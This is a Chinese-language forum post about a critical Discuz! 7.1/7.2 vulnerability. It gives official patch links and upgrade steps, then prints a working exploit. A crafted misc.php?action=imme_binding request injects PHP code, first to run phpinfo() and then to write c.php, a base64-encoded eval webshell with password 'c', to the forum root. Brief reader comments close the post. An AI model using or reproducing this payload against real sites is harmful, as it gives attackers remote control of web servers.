著名开源论坛程序Discuz!于昨晚再爆高危漏洞
据了解,昨日晚些时候,国内T00ls安全组织的核心成员oldjun,xhming等人发现了Discuz!最新版本的高危漏洞,该漏洞可导致直接获得服务器WEBSHELL(一种以web形式控制服务器的方式),目前使用Discuz!7.2版本的站点不在少数,Discuz!官方已发布更新补丁,请各大论坛站长更新.
解决方案:
下载并安装软件厂商提供的补丁程序,具体过程如下:
1. 根据软件版本下载相应补丁包
7.1 用户 http://download2.comsenz.com/Discuz/patch/7.1/D710_UPGRADE_TO_20100110.zip
7.2 用户 http://download2.comsenz.com/Discuz/patch/7.2/D720_UPGRADE_TO_20100110.zip
2. 解压缩文件
3. 上传upload目录中的所有文件到论坛, 覆盖原有程序
4. 修复完成
参考信息:
http://www.discuz.net/thread-1537673-1-1.html
oldjun漏洞利用代码(请勿用于非法用途)
注册一个用户登陆,然后提交
-
misc.php?action=imme_binding&response
- [result]=1:2&scriptlang[1][2]={${phpinfo()}}
利用exp
提交
-
misc.php?action=imme_binding&response
- [result]=aa:b&scriptlang[aa][b]
- ={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode
- (PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}
在论坛根目录生成一个c.php 的一句话木马 cnmoker.org
连接密码为c
[yangcongtou::face020.gif]很是期待利用的视频或者文摘
@灰烬, [yangcongtou::face052.gif]不做这一行
还是看不太明白怎么利用也